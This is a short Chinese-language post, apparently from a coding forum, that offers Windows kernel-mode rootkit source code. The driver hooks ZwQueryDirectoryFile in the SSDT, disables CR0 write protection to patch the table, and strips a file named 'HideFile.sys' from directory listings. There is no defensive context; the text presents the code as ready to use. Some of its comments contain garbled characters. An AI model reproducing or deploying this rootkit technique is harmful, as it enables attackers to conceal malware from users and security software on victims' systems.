RootKit级别文件隐藏代码
//采用SSDT Hook ,稳定。。。
///直接看代码
#include "ZwQueryDirectoryFile.h"
ULONG g_uCr0;
//
ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile;
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
)
{
NTSTATUS status;
ULONG CR0VALUE;
ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
UNICODE_STRING uniFileName;
RtlInitAnsiString(&HideDirFile,"HideFile.sys");
DbgPrint("hide: NewZwQueryDirectoryFile called.");
status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
Length,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
//这部分是隐藏文件的核心部分
if(NT_SUCCESS(status)&&FileInformationClass==FileBothDirectoryInformation)
{
PFILE_BOTH_DIR_INFORMATION pFileInfo;
PFILE_BOTH_DIR_INFORMATION pLastFileInfo;
BOOLEAN bLastOne;
pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation;
pLastFileInfo = NULL;
do
{
bLastOne = !( pFileInfo->NextEntryOffset );
RtlInitUnicodeString(&uniFileName,pFileInfo->FileName);
RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
//DbgPrint("ansiFileName :%s\n",ansiFileName.Buffer);
//DbgPrint("HideDirFile :%s\n",HideDirFile.Buffer);
if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length)
{
if(bLastOne)
{
pLastFileInfo->NextEntryOffset = 0;
break;
}
else //指针往后移动
{
int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
continue;
}
}
pLastFileInfo = pFileInfo;
pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);
}while(!bLastOne);
RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
}
return status;
}
void WPOFF()
{
ULONG uAttr;
_asm
{
push eax;
mov eax, cr0;
mov uAttr, eax;
and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
mov cr0, eax;
pop eax;
cli
};
g_uCr0 = uAttr; //保存原有的 CRO �傩�
}
VOID WPON()
{
_asm
{
sti
push eax;
mov eax, g_uCr0; //恢�驮�有 CR0 �傩�
mov cr0, eax;
pop eax;
};
}
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
WPOFF();
UNHOOK(FUNINDEX,OldZwQueryDirectoryFile);
WPON();
}
extern "C"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
IN PUNICODE_STRING theRegistryPath)
{
WPOFF();
PVOID pOld;
HOOK(FUNINDEX,NewZwQueryDirectoryFile,pOld);
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)pOld;
WPON();
theDriverObject->DriverUnload = OnUnload;
return STATUS_SUCCESS;
}